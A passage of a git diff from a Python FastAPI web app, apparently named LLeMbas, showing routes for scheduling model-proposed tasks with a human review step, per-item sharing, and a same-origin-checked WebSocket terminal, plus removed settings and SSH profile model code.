times = [t.strip() for t in str(form.get("times") or "09:00").split(",") if t.strip()]
raw["at"] = {
"weekdays": [int(d) for d in form.getlist("weekdays") if str(d).isdigit()],
"times": times,
}
days = str(form.get("month_days") or "").strip()
if days:
raw["at"]["days"] = [int(d) for d in days.split(",") if d.strip().isdigit()]
try:
count = int(form.get("count") or 0)
except (TypeError, ValueError):
count = 0
if count > 0:
raw["count"] = count
until = str(form.get("until") or "").strip()
if until:
raw["until"] = f"{until}T23:59:00"
return raw
def _form_values(
*, schedule: Schedule | None = None, compiled=None
) -> dict:
"""Everything `schedules/_form.html` renders, from whichever source there is.
One dict for both pages, because they are the same fields: an existing row
on the edit page, and what the compile proposed on the new one. The form
reads only this, so what a model suggested is displayed through exactly the
same path as what is stored -- there is no branch in the template that could
show one of them differently.
"""
if compiled is not None:
values = _rule_defaults_from(compiled.rule)
values.update(
title=compiled.title, instruction=compiled.instruction, target=compiled.target
)
return values
values = _rule_defaults_from((schedule.rule_json if schedule else {}) or {})
values.update(
title=schedule.title if schedule else "",
instruction=schedule.instruction if schedule else "",
target=schedule.target if schedule else TARGET_CHAT,
)
return values
def _rule_defaults_from(rule: dict) -> dict:
"""What the form should show for a rule.
Derived from the *normalised* rule, so the form and the engine cannot
disagree about what is stored -- an edit screen showing something other
than what runs is the same failure as a label that names the wrong tool.
Shared by the edit page and by the compile's review step, so what a model
proposed is displayed through exactly the same path as what is saved.
"""
rule = rule or {}
at = rule.get("at") or {}
every = rule.get("every") or {}
if at:
repeat = REPEAT_CALENDAR
elif every:
repeat = REPEAT_EVERY
else:
repeat = REPEAT_ONCE
minutes = int(every.get("minutes") or 0)
unit, amount = "minutes", minutes
for size, name in ((10080, "weeks"), (1440, "days"), (60, "hours")):
if minutes and not minutes % size:
unit, amount = name, minutes // size
break
return {
"repeat": repeat,
"every_unit": unit,
"every_amount": amount or 1,
"weekdays": at.get("weekdays") or [],
"times": ", ".join(at.get("times") or []),
"month_days": ", ".join(str(d) for d in at.get("days") or []),
"count": rule.get("count") or 0,
}
def _context(db, user, schedule: Schedule | None, *, error: str = "") -> dict:
return {
"section": "scheduled",
"schedule": schedule,
"targets": OFFERED_TARGETS,
"weekday_names": list(
enumerate(("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"))
),
"form": _form_values(schedule=schedule),
"error": error,
"models": chat_service.available_models(db, user),
"timezone": clock.name_for(user) or str(clock.server_zone()),
**sidebar_context(db, user),
}
# --- The list ------------------------------------------------------------------
@router.get("/scheduled")
async def scheduled_list(request: Request, db: Db, user: RequiredUser):
rows = list(
db.scalars(schedules_service.visible(user).order_by(Schedule.created_at.desc()))
)
zone = clock.zone_for(user)
return render(
request,
"schedules/index.html",
{
"section": "scheduled",
"schedules": [
{
"row": row,
"summary": rule_service.describe(row.rule_json or {}, zone=zone),
"next": clock.as_utc(row.next_fire_at).astimezone(zone)
if row.next_fire_at
else None,
}
for row in rows
],
**sidebar_context(db, user),
},
)
@router.get("/scheduled/new")
async def new_schedule(request: Request, db: Db, user: RequiredUser, error: str = ""):
"""One question: what do you want to schedule?
The detail comes from the compile. The manual form is on the same page
behind a disclosure, so somebody who already knows exactly when it should
run does not have to describe it in prose and hope.
"""
return render(
request,
"schedules/new.html",
{**_context(db, user, None, error=error), "compiled": None, "described": ""},
)
@router.post("/api/schedules/describe")
async def describe_schedule(request: Request, db: Db, user: RequiredUser):
"""Work a plain-language request into a schedule, and show it back.
Deliberately a *review* step rather than creating the schedule outright.
The whole point of the compile is that a model chose the timing, and a
timing nobody looked at is exactly the standing instruction this codebase
refuses to create silently elsewhere.
Nothing here can fail into an error page: a cleared fragment, an endpoint
that is down, prose instead of JSON and a rule that means nothing all end at
the same place, which is the form with the reader's own words in it and a
line saying what to finish.
"""
from lembas.services import prompts as prompts_service
from lembas.services.schedule import compile as compile_service
form = await request.form()
described = str(form.get("request") or "").strip()
template = prompts_service.resolve(db, "task.schedule_compile")
resolved = compile_service.endpoint_for(db, user)
if resolved is None:
compiled = compile_service.Compiled(
instruction=described,
title=described[:80],
reason="There is no model configured to work this out, so fill it in yourself.",
)
else:
endpoint, model_id = resolved
compiled = await compile_service.compile_request(
endpoint, model_id, described, template=template, user=user
)
context = _context(db, user, None)
# The compiled values become the form's values, so the reader edits what the
# model proposed rather than being shown it beside an empty form.
context["form"] = _form_values(compiled=compiled)
return render(
request,
"schedules/new.html",
{
**context,
"compiled": compiled,
"described": described,
"summary": rule_service.describe(compiled.rule, zone=clock.zone_for(user))
if compiled.rule
else "",
},
)
@router.get("/scheduled/{schedule_id}/edit")
async def edit_schedule(
request: Request, db: Db, user: RequiredUser, schedule_id: str, error: str = ""
):
schedule = schedules_service.get(db, schedule_id, user)
if schedule is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
return render(request, "schedules/edit.html", _context(db, user, schedule, error=error))
# --- Writing --------------------------------------------------------------------
@router.post("/api/schedules")
async def create_schedule(request: Request, db: Db, user: RequiredUser) -> Response:
form = await request.form()
try:
schedule = schedules_service.create(
db,
owner=user,
title=str(form.get("title") or ""),
instruction=str(form.get("instruction") or ""),
request=str(form.get("instruction") or ""),
rule=_rule_from_form(form),
target=str(form.get("target") or TARGET_CHAT),
model_id=str(form.get("model_id") or ""),
)
except schedules_service.ScheduleError as error:
# Back to the form with the reason, rather than a 400 nobody can act on.
return RedirectResponse(
f"/scheduled/new?error={error}", status_code=status.HTTP_303_SEE_OTHER
)
return RedirectResponse(f"/chat/{schedule.chat_id}", status_code=status.HTTP_303_SEE_OTHER)
@router.post("/api/schedules/{schedule_id}")
async def save_schedule(
request: Request, db: Db, user: RequiredUser, schedule_id: str
) -> Response:
schedule = schedules_service.get(db, schedule_id, user)
if schedule is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
form = await request.form()
try:
schedules_service.update(
db,
schedule,
owner=user,
title=str(form.get("title") or ""),
instruction=str(form.get("instruction") or ""),
rule=_rule_from_form(form),
target=str(form.get("target") or TARGET_CHAT),
)
except schedules_service.ScheduleError as error:
return RedirectResponse(
f"/scheduled/{schedule_id}/edit?error={error}",
status_code=status.HTTP_303_SEE_OTHER,
)
return RedirectResponse(f"/chat/{schedule.chat_id}", status_code=status.HTTP_303_SEE_OTHER)
@router.post("/api/schedules/{schedule_id}/toggle")
async def toggle_schedule(
db: Db, user: RequiredUser, schedule_id: str, enabled: str = Form("")
) -> Response:
schedule = schedules_service.get(db, schedule_id, user)
if schedule is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
schedules_service.set_enabled(
db, schedule, owner=user, enabled=enabled not in ("", "0", "false")
)
return RedirectResponse(
f"/chat/{schedule.chat_id}", status_code=status.HTTP_303_SEE_OTHER
)
@router.post("/api/schedules/{schedule_id}/run")
async def run_schedule(db: Db, user: RequiredUser, schedule_id: str) -> Response:
"""Fire it now, without consuming the run it was scheduled for.
`runner.run_now` is a different entry point from the ticker's for exactly
that reason -- testing a schedule must not skip the real one.
"""
schedule = schedules_service.get(db, schedule_id, user)
if schedule is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
chat_id = schedule.chat_id
await runner.run_now(schedule_id)
return RedirectResponse(f"/chat/{chat_id}", status_code=status.HTTP_303_SEE_OTHER)
@router.post("/api/schedules/{schedule_id}/delete")
async def delete_schedule(
db: Db, user: RequiredUser, schedule_id: str, keep_chat: str = Form("1")
) -> Response:
schedule = schedules_service.get(db, schedule_id, user)
if schedule is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That schedule is not available.")
schedules_service.delete(db, schedule, keep_chat=keep_chat not in ("", "0", "false"))
return RedirectResponse("/scheduled", status_code=status.HTTP_303_SEE_OTHER)
-176
View File
@@ -1,176 +0,0 @@
"""Giving somebody else access to one thing.
Its own routes and its own fragment, rather than a block of checkboxes riding
along with the resource's save form. Three reasons, in the order they bite:
- **It rendered every group and every person on the instance, unpaginated, on
every detail page.** That is fine for a household and unusable for anything
else, and the page it is on has nothing to do with how many accounts exist.
- **A share was only stored if the resource was saved.** Ticking a box and
navigating away did nothing, silently, which is the shape of failure this
codebase keeps cataloguing.
- Sharing a *report* has no save form to ride along with at all.
So: search, and each grant is its own POST. The fragment re-renders itself after
every change, which is what keeps "who can see this" a thing you read rather
than a thing you reconstruct from checkboxes.
**Only the owner may reach any of it.** Somebody a thing was shared with cannot
share it on -- that is what keeps "who can see this?" answerable by asking one
person -- and the check is `sharing.can_write`, which is ownership and nothing
else.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, Form, HTTPException, Request, Response, status
from sqlalchemy import or_, select
from lembas.api.deps import Db, RequiredUser
from lembas.db.models import (
PRINCIPAL_GROUP,
PRINCIPAL_USER,
Group,
KnowledgeBase,
Note,
Report,
Skill,
User,
)
from lembas.security import permissions
from lembas.services import sharing
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(prefix="/api/library/share", tags=["sharing"])
# What a URL may name, and what it resolves to. A fixed table rather than a
# lookup by string on `sharing.RESOURCE_TYPES`, because that one maps class to
# string and this needs the other direction -- and because a route segment is
# request input, so the set of things it may name belongs written down.
KINDS: dict[str, type] = {
"base": KnowledgeBase,
"note": Note,
"skill": Skill,
"report": Report,
}
# Candidates offered at once. Enough that a small instance never has to type
# anything, few enough that a large one is not a page of names.
MAX_CANDIDATES = 12
def _resource(db: Db, kind: str, resource_id: str, user: User):
model = KINDS.get(kind)
if model is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "Not a shareable kind.")
resource = db.get(model, resource_id)
# Ownership, not readability. Being able to see a thing is not being able to
# give it away, and the 404 rather than a 403 is deliberate: somebody who
# cannot share it has no business learning whether it exists.
if resource is None or not sharing.can_write(resource, user):
raise HTTPException(status.HTTP_404_NOT_FOUND, "That is not yours to share.")
return resource
def _panel(request: Request, db: Db, user: User, kind: str, resource, q: str = "") -> Response:
grants = sharing.grants_for(db, resource)
shared_users = [g.principal_id for g in grants if g.principal_type == PRINCIPAL_USER]
shared_groups = [g.principal_id for g in grants if g.principal_type == PRINCIPAL_GROUP]
needle = q.strip()
pattern = f"%{needle}%"
group_query = select(Group).order_by(Group.name)
people_query = select(User).where(User.id != user.id).order_by(User.name)
if needle:
group_query = group_query.where(Group.name.ilike(pattern))
people_query = people_query.where(
or_(User.name.ilike(pattern), User.email.ilike(pattern))
)
# Anything already shared is shown whatever the search says, or the only way
# to remove a grant would be to search for the name it was given to.
groups = list(db.scalars(group_query.limit(MAX_CANDIDATES)))
people = list(db.scalars(people_query.limit(MAX_CANDIDATES)))
for existing in db.scalars(select(Group).where(Group.id.in_(shared_groups or [""]))):
if existing.id not in {g.id for g in groups}:
groups.insert(0, existing)
for existing in db.scalars(select(User).where(User.id.in_(shared_users or [""]))):
if existing.id not in {p.id for p in people}:
people.insert(0, existing)
return render(
request,
"library/_share_panel.html",
{
"kind": kind,
"resource": resource,
"q": needle,
"groups": groups,
"people": people,
"shared_users": shared_users,
"shared_groups": shared_groups,
"share_count": len(grants),
# Whether the lists were cut, so the panel can say "search for
# somebody" rather than implying these are all the names there are.
"truncated": len(people) >= MAX_CANDIDATES or len(groups) >= MAX_CANDIDATES,
},
)
@router.get("/{kind}/{resource_id}")
async def share_panel(
request: Request, db: Db, user: RequiredUser, kind: str, resource_id: str, q: str = ""
) -> Response:
resource = _resource(db, kind, resource_id, user)
if not permissions.has(db, user, "library.share"):
raise HTTPException(status.HTTP_403_FORBIDDEN, "You may not share things.")
return _panel(request, db, user, kind, resource, q)
@router.post("/{kind}/{resource_id}")
async def set_share(
request: Request,
db: Db,
user: RequiredUser,
kind: str,
resource_id: str,
principal_type: str = Form(""),
principal_id: str = Form(""),
on: bool = Form(False),
q: str = Form(""),
) -> Response:
"""Add or remove one grant, and answer with the panel.
One grant per request rather than a submitted set, because the set is what
made the old panel need every name on the instance in front of you before
you could change one of them.
"""
resource = _resource(db, kind, resource_id, user)
if not permissions.has(db, user, "library.share"):
raise HTTPException(status.HTTP_403_FORBIDDEN, "You may not share things.")
if principal_type not in (PRINCIPAL_USER, PRINCIPAL_GROUP):
raise HTTPException(status.HTTP_400_BAD_REQUEST, "Unknown principal.")
grants = sharing.grants_for(db, resource)
users = [g.principal_id for g in grants if g.principal_type == PRINCIPAL_USER]
groups = [g.principal_id for g in grants if g.principal_type == PRINCIPAL_GROUP]
target = users if principal_type == PRINCIPAL_USER else groups
# Validated against what exists, so a crafted id cannot write a grant naming
# nothing -- which would be invisible in the panel and unremovable from it.
exists = db.get(User if principal_type == PRINCIPAL_USER else Group, principal_id)
if on and exists is not None and principal_id not in target:
target.append(principal_id)
elif not on and principal_id in target:
target.remove(principal_id)
sharing.set_grants(db, resource, user_ids=users, group_ids=groups)
log.info(
"%s %s %s %s with %s", user.email, "shared" if on else "unshared", kind,
resource_id, principal_id,
)
return _panel(request, db, user, kind, resource, q)
-340
View File
@@ -1,340 +0,0 @@
"""The socket behind the terminal panel.
A WebSocket rather than SSE, because SSE is one-directional and a terminal is
not: keystrokes have to go up, and an HTTP round trip per keypress is not a
terminal. It is the only WebSocket in LLeMbas, and it is worth saying what that
costs -- a cross-site page that could reach this endpoint would have a shell on
somebody's machine, not merely a copy of their chat. So there are two locks on
the door, and this module is mostly them.
**Where a refusal happens is load-bearing.** A browser tells a page nothing
about a handshake that *failed*: `new WebSocket()` fires `error` with no status
and no reason. So the socket is accepted first and the reason sent as a frame
for everything a person could act on -- no permission, the connection is
disabled, its host key was never confirmed -- and refused before accepting only
for the two cases where accepting is itself the risk.
It holds no database session. A dependency would keep one open for the hour a
shell sits at a prompt; `session_scope()` opens one for the authorisation and
closes it, exactly as `generation._run` does.
"""
from __future__ import annotations
import asyncio
import contextlib
import json
import logging
from urllib.parse import urlsplit
from fastapi import APIRouter, HTTPException, WebSocket, WebSocketDisconnect, status
from lembas.api.deps import Db, RequiredUser
from lembas.db.models import KIND_AGENT, Chat
from lembas.db.session import session_scope
from lembas.security import permissions
from lembas.security.sessions import COOKIE_NAME, resolve_session
from lembas.services import settings_store
from lembas.services.agent import draft as draft_service
from lembas.services.agent import session as agent_session
from lembas.services.agent import terminal as terminal_service
from lembas.services.agent.base import ExecError
log = logging.getLogger(__name__)
router = APIRouter(prefix="/api/chats", tags=["terminal"])
# Nothing a keyboard produces is anywhere near this. Paste is the only thing
# that comes close, and a megabyte pasted into a shell is a mistake either way.
MAX_INPUT_BYTES = 256 * 1024
# 1008 is "policy violation", the closest thing the protocol has to "no".
CLOSE_POLICY = 1008
# What the far side is told when a shell ends, in words rather than a code.
CLOSED_WORDS = {
terminal_service.CLOSED_EXITED: "The shell exited.",
terminal_service.CLOSED_IDLE: "This terminal was closed after sitting idle.",
terminal_service.CLOSED_SHUTDOWN: "LLeMbas restarted, so this shell was closed.",
terminal_service.CLOSED_REVOKED: "The connection behind this terminal was closed.",
terminal_service.CLOSED_ERROR: "The connection to the machine was lost.",
}
def _same_origin(websocket: WebSocket) -> bool:
"""Whether this handshake came from a page served by this site.
Required, not merely checked when present. The session cookie is SameSite
Lax, which already withholds it from a handshake a foreign page starts, and
this is the belt to that brace -- an absent Origin is not a browser, and a
non-browser client has no business here.
"""
origin = websocket.headers.get("origin")
host = websocket.headers.get("host")
if not origin or not host:
return False
return urlsplit(origin).netloc.lower() == host.lower()
def _chat_or_draft(db, user, chat_id: str):
"""The chat this panel belongs to, real or still being decided.
A draft resolves to a transient `Chat` -- see services/agent/draft.py --
which is what lets the terminal open on the new-chat screen without
`_prepare` or `agent_session.resolve` learning that drafts exist.
"""
if draft_service.is_draft(chat_id):
draft = draft_service.get(chat_id, user.id)
return draft_service.as_chat(draft) if draft is not None else None
chat = db.get(Chat, chat_id)
return chat if chat is not None and chat.user_id == user.id else None
def _prepare(db, user, chat_id: str) -> tuple[str, dict]:
"""Everything that has to be true, and what opening needs. One or the other.
Returns a message to show, or the arguments for `open_session`. The order is
the order somebody would ask the questions in, and every "no" is a sentence
rather than a silence.
"""
if not permissions.has(db, user, "agent.terminal"):
return "You do not have permission to open a terminal.", {}
chat = _chat_or_draft(db, user, chat_id)
if chat is None:
return "That chat no longer exists.", {}
if chat.kind != KIND_AGENT:
return "This is an ordinary chat, so it has no machine to open a shell on.", {}
values = settings_store.agents(db)
if not values.get("terminal_enabled", True):
return "The terminal is switched off on this instance.", {}
context = agent_session.resolve(db, chat, user)
if context is None:
return (
"This chat's connection is not usable: it may have been deleted, "
"disabled, or agent chats may be switched off here.",
{},
)
return "", {
"owner_id": user.id,
"profile_id": chat.ssh_profile_id or "",
"label": context.label,
"spec": context.spec,
"project_dir": context.project_dir,
"idle_timeout": float(values["terminal_idle_timeout"]),
"max_sessions": int(values["terminal_max_sessions"]),
"max_per_user": int(values["terminal_max_per_user"]),
"integrate": bool(values.get("terminal_integration", True)),
}
@router.websocket("/{chat_id}/terminal/ws")
async def terminal_socket(
websocket: WebSocket,
chat_id: str,
cols: int = 80,
rows: int = 24,
) -> None:
if not _same_origin(websocket):
await websocket.close(code=CLOSE_POLICY)
return
with session_scope() as db:
user = resolve_session(db, websocket.cookies.get(COOKIE_NAME))
if user is None:
await websocket.close(code=CLOSE_POLICY)
return
problem, opening = _prepare(db, user, chat_id)
owner_email = user.email
await websocket.accept()
if problem:
await _refuse(websocket, problem)
return
try:
session = await terminal_service.open_session(chat_id, cols=cols, rows=rows, **opening)
except ExecError as exc:
await _refuse(websocket, str(exc))
return
except Exception: # noqa: BLE001 - a failure here is one socket, not the app
log.exception("could not open a terminal for %s", owner_email)
await _refuse(websocket, "The shell could not be started.")
return
# Shaping a frame is this layer's job, not the session's; the session only
# knows it finished something. Reassigned per socket and harmless: every
# socket on this session would build the identical frame.
session.on_command = lambda found: session.announce(
json.dumps({"t": "command", "command": _command_frame(found)})
)
viewer = session.attach(cols, rows)
await websocket.send_text(
json.dumps(
{
"t": "ready",
"label": session.label,
"dir": session.project_dir,
"cols": session.cols,
"rows": session.rows,
# Two tabs share one shell, and a size neither of them chose is
# otherwise a mystery.
"shared": len(session.viewers) > 1,
# Whether this shell will tell us where commands begin and end,
# which is what the Copy and Send buttons are made of.
"integration": session.integration,
"last": _command_frame(session.latest()),
}
)
)
if viewer.snapshot:
await websocket.send_bytes(viewer.snapshot)
downward = asyncio.create_task(_to_browser(websocket, session, viewer))
upward = asyncio.create_task(_from_browser(websocket, session, viewer))
try:
await asyncio.wait({downward, upward}, return_when=asyncio.FIRST_COMPLETED)
finally:
for task in (downward, upward):
task.cancel()
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
# The session is deliberately left running. Closing the panel, or
# navigating away, is not "I am finished with this machine" -- a build
# carries on and the scrollback is still there on the way back. The
# idle timeout is what eventually ends it.
session.detach(viewer)
@router.get("/{chat_id}/terminal/last")
async def last_command(db: Db, user: RequiredUser, chat_id: str) -> dict:
"""The last command and its output, rendered ready to paste.
The *server* renders the text, so Copy and Send are a fetch and a
clipboard write with no formatting logic in the browser -- and the block a
model eventually reads exists in exactly one place. The panel's own screen
buffer could not produce it anyway: it holds what is on screen, hard-wrapped
at the terminal's width, with no way to tell a wrap from a newline.
"""
if _chat_or_draft(db, user, chat_id) is None:
raise HTTPException(status.HTTP_404_NOT_FOUND, "That chat no longer exists.")
if not permissions.has(db, user, "agent.terminal"):
raise HTTPException(status.HTTP_403_FORBIDDEN, "You cannot open a terminal.")
session = terminal_service.get(chat_id)
found = session.latest() if session is not None else None
if session is None or found is None:
return {
"ok": False,
"message": "Nothing has been run in this shell yet."
if session is not None
else "This terminal is not open.",
}
return {
"ok": True,
"command": found.command,
"cwd": found.cwd,
"exit": found.exit_status,
"running": found.running,
"summary": found.summary(),
"text": found.as_text(label=session.label),
}
def _command_frame(found) -> dict | None:
"""A finished command, small enough to push at every viewer.
Tens of bytes, and deliberately *not* the output: a 64KB text frame would
compete with PTY bytes on the one path that has to stay responsive, and the
two buttons are pressed by a person, where a request is the natural shape.
"""
if found is None:
return None
return {
"seq": found.seq,
"command": found.command,
"cwd": found.cwd,
"exit": found.exit_status,
"running": found.running,
"ms": found.duration_ms,
"summary": found.summary(),
}
async def _to_browser(websocket: WebSocket, session, viewer) -> None:
"""Everything the shell says, plus the one frame that says it stopped."""
while True:
chunk = await viewer.queue.get()
if chunk is None:
reason = terminal_service.CLOSED_EXITED if viewer.dropped else session.closed_reason
payload = {"t": "closed", "reason": reason, "message": _words(reason)}
if viewer.dropped:
# Not the session's doing: this browser stopped reading and was
# disconnected so the others kept up. Reconnecting costs it
# nothing, because the scrollback is the state.
payload = {"t": "behind", "message": "Reconnecting: output arrived faster than "
"this window could draw it."}
with contextlib.suppress(Exception):
await websocket.send_text(json.dumps(payload))
return
# A string in the queue is a control frame that had to keep its place
# in the stream -- see `Session.announce`.
if isinstance(chunk, str):
await websocket.send_text(chunk)
continue
await websocket.send_bytes(chunk)
async def _from_browser(websocket: WebSocket, session, viewer) -> None:
"""Keystrokes as binary, everything else as JSON.
Binary for the hot path is what makes multi-byte characters safe: a read on
the far side lands mid-sequence often enough to matter, and decoding each
frame here would corrupt every boundary. Nothing decodes, so nothing splits.
"""
while True:
try:
message = await websocket.receive()
except WebSocketDisconnect:
return
if message["type"] == "websocket.disconnect":
return
data = message.get("bytes")
if data is not None:
if len(data) > MAX_INPUT_BYTES:
continue
await session.send(data)
continue
text = message.get("text")
if text:
_control(session, viewer, text)
def _control(session, viewer, text: str) -> None:
try:
payload = json.loads(text)
except ValueError:
return
if not isinstance(payload, dict) or payload.get("t") != "resize":
return
session.resize(viewer, payload.get("cols", 80), payload.get("rows", 24))
def _words(reason: str) -> str:
return CLOSED_WORDS.get(reason, "This terminal closed.")
async def _refuse(websocket: WebSocket, message: str) -> None:
"""Say why, then close. Sent as a frame because a browser cannot read a
rejected handshake -- the reason would be lost exactly when it is needed."""
with contextlib.suppress(Exception):
await websocket.send_text(json.dumps({"t": "error", "message": message}))
with contextlib.suppress(Exception):
await websocket.close()
-16
View File
@@ -38,22 +38,6 @@ class Settings(BaseSettings):
session_ttl: int = 60 * 60 * 24 * 30
request_timeout: float = 300.0
# What `/admin/updates` compares against and the helper deploys.
#
# Deployment configuration and deliberately not instance settings: they
# decide what code runs on this machine, and a value a web administrator
# could edit would turn "you may deploy the channel" into "you may deploy
# anything". `deploy/install.sh` writes both beside the rest.
#
# `stable` follows the newest release tag; `edge` follows the branch tip.
# Stable is the default because a branch tip is not a release -- following
# one means deploying whatever was pushed five minutes ago, which is right
# for whoever is building this and wrong for whoever is running it.
update_channel: Literal["stable", "edge"] = "stable"
# Which branch is fetched, and which one `edge` follows. Stable needs it too:
# a fetch has to name a branch, and tags come down with it.
update_branch: str = "main"
@model_validator(mode="after")
def _generate_secret_if_absent(self) -> Settings:
# A generated key lets `lembas serve` work with no configuration at all,
-1
View File
@@ -121,7 +121,6 @@ FTS_INDEXES: tuple[tuple[str, str, tuple[str, ...]], ...] = (
("documents_fts", "documents", ("title", "description", "extracted_text")),
("notes_fts", "notes", ("title", "body")),
("skills_fts", "skills", ("name", "description", "body")),
("reports_fts", "reports", ("title", "summary", "body")),
)
-104
View File
@@ -5,27 +5,13 @@ what ``init_db()`` relies on to create the schema at startup. Any new model
module must be imported here or its table will silently never be created.
"""
from lembas.db.models.agent import (
AUTH_KEY,
AUTH_METHODS,
AUTH_PASSWORD,
Job,
SshProfile,
)
from lembas.db.models.attachment import (
KIND_DOCUMENT,
KIND_IMAGE,
KIND_TEXT,
Attachment,
)
from lembas.db.models.canvas import ScratchDoc
from lembas.db.models.chat import (
ALL_KINDS,
KIND_AGENT,
KIND_CHAT,
KIND_MESSAGES,
KIND_TASK,
KINDS,
ROLE_ASSISTANT,
ROLE_SYSTEM,
ROLE_TOOL,
@@ -35,24 +21,16 @@ from lembas.db.models.chat import (
Message,
)
from lembas.db.models.connection import Connection, Model, model_groups
from lembas.db.models.image import ImageWorkflow
from lembas.db.models.library import (
AUTHOR_MODEL,
AUTHOR_USER,
CHUNK_DOCUMENT,
CHUNK_KINDS,
CHUNK_NOTE,
CHUNK_REPORT,
CHUNK_SKILL,
PRINCIPAL_GROUP,
PRINCIPAL_USER,
RESOURCE_BASE,
RESOURCE_NOTE,
RESOURCE_REPORT,
RESOURCE_SKILL,
SOURCE_LINK,
SOURCE_UPLOAD,
Chunk,
Document,
KnowledgeBase,
Memory,
@@ -62,137 +40,55 @@ from lembas.db.models.library import (
SkillRevision,
chat_knowledge_bases,
)
from lembas.db.models.report import (
SOURCE_CHAT,
SOURCE_MANUAL,
SOURCE_SCHEDULE,
SOURCES,
Report,
)
from lembas.db.models.schedule import (
ORIGIN_MODEL,
ORIGIN_USER,
ORIGINS,
TARGET_CHAT,
TARGET_MESSAGES,
TARGET_REPORT,
TARGETS,
Schedule,
)
from lembas.db.models.setting import Setting
from lembas.db.models.suggestion import Suggestion
from lembas.db.models.tool import (
RESPONSE_JSON,
RESPONSE_MODES,
RESPONSE_RAW,
RESPONSE_TEXT,
SECRET_BEARER,
SECRET_HEADER,
SECRET_NONE,
SECRET_PLACEMENTS,
SECRET_QUERY,
CustomTool,
McpServer,
custom_tool_groups,
mcp_server_groups,
)
from lembas.db.models.user import (
ROLE_ADMIN,
ROLE_PENDING,
Group,
PushSubscription,
Session,
Usage,
User,
user_groups,
)
__all__ = [
"AUTHOR_MODEL",
"PushSubscription",
"Usage",
"AUTH_KEY",
"AUTH_METHODS",
"AUTH_PASSWORD",
"AUTHOR_USER",
"ALL_KINDS",
"Attachment",
"KINDS",
"KIND_AGENT",
"KIND_CHAT",
"KIND_DOCUMENT",
"KIND_IMAGE",
"KIND_MESSAGES",
"KIND_TASK",
"KIND_TEXT",
"PRINCIPAL_GROUP",
"PRINCIPAL_USER",
"RESOURCE_BASE",
"RESOURCE_NOTE",
"RESOURCE_REPORT",
"RESOURCE_SKILL",
"RESPONSE_JSON",
"RESPONSE_MODES",
"RESPONSE_RAW",
"RESPONSE_TEXT",
"ROLE_ADMIN",
"ROLE_ASSISTANT",
"ROLE_PENDING",
"ROLE_SYSTEM",
"ROLE_TOOL",
"ROLE_USER",
"SECRET_BEARER",
"SECRET_HEADER",
"SECRET_NONE",
"SECRET_PLACEMENTS",
"SECRET_QUERY",
"ORIGINS",
"ORIGIN_MODEL",
"ORIGIN_USER",
"SOURCES",
"SOURCE_CHAT",
"SOURCE_LINK",
"SOURCE_MANUAL",
"SOURCE_SCHEDULE",
"SOURCE_UPLOAD",
"TARGETS",
"TARGET_CHAT",
"TARGET_MESSAGES",
"TARGET_REPORT",
"Report",
"Schedule",
"Chat",
"Job",
"Connection",
"CustomTool",
"CHUNK_DOCUMENT",
"CHUNK_KINDS",
"CHUNK_NOTE",
"CHUNK_REPORT",
"CHUNK_SKILL",
"Chunk",
"Document",
"Folder",
"Group",
"ImageWorkflow",
"KnowledgeBase",
"McpServer",
"Memory",
"Message",
"Model",
"Note",
"ScratchDoc",
"Session",
"Setting",
"Share",
"Skill",
"SshProfile",
"SkillRevision",
"Suggestion",
"User",
"chat_knowledge_bases",
"custom_tool_groups",
"mcp_server_groups",
"model_groups",
"user_groups",
]
-147
View File
@@ -1,147 +0,0 @@
"""SSH connections an agent chat can act through.
User-owned, like a `Note` and unlike a `Connection`. That is the opposite of
the rule custom tools and MCP servers follow, and the difference is the point:
those are instance configuration an administrator could grant themselves in one
click anyway, while this is somebody's own machine and somebody's own key.
"Anyone in this group may log in to my server" is a different feature with a
different blast radius.
`services/sharing.py` is deliberately not involved either. Sharing grants
reading, and a host somebody else can read is a host they can log in to.
**Nothing an agent does runs on the LLeMbas machine.** A local sandbox was
designed and dropped: every hard problem in it came from executing on the host
that holds the database and the encryption key. Over SSH, isolation is whatever
host somebody points this at -- which means the security of an agent chat is the
security of that host, and nothing here can tell a throwaway container from a
production server. The admin copy says so out loud.
"""
from __future__ import annotations
from datetime import datetime
from typing import TYPE_CHECKING, Any
from sqlalchemy import Boolean, DateTime, ForeignKey, Integer, String, Text, UniqueConstraint
from sqlalchemy.orm import Mapped, mapped_column, relationship
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
from lembas.db.types import JSONDict
if TYPE_CHECKING: # pragma: no cover - annotation only
from lembas.db.models.user import User
# How the connection authenticates.
AUTH_KEY = "key"
AUTH_PASSWORD = "password"
AUTH_METHODS = (AUTH_KEY, AUTH_PASSWORD)
class SshProfile(UUIDPrimaryKey, Timestamps, Base):
"""One host somebody can point an agent chat at."""
__tablename__ = "ssh_profiles"
__table_args__ = (UniqueConstraint("owner_id", "name", name="uq_ssh_profile_name"),)
owner_id: Mapped[str] = mapped_column(
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
)
name: Mapped[str] = mapped_column(String(120), nullable=False)
host: Mapped[str] = mapped_column(String(255), nullable=False)
port: Mapped[int] = mapped_column(Integer, default=22, nullable=False)
username: Mapped[str] = mapped_column(String(120), nullable=False)
# Whether `host` resolved to loopback the last time anybody looked. Written
# where a network call is already happening -- saving this connection, and
# Check -- and read on every request that asks whether this connection may
# be used at all. A column rather than a lookup because that question is
# asked several times per page render, and `getaddrinfo` on the request path
# makes an agent page wait out a DNS timeout for a host nobody is talking
# to. A literal `127.0.0.1` needs none of this and is decided from the
# string. See services/agent/hosts.py.
#
# False on every row an upgrade brings in, which is correct for the literal
# case (decided from the string anyway) and optimistic for a *name* until it
# is next saved or checked.
resolves_here: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
auth: Mapped[str] = mapped_column(String(16), default=AUTH_KEY, nullable=False)
password_encrypted: Mapped[str] = mapped_column(Text, default="")
private_key_encrypted: Mapped[str] = mapped_column(Text, default="")
key_passphrase_encrypted: Mapped[str] = mapped_column(Text, default="")
# One OpenSSH known_hosts line, captured the first time this host answered
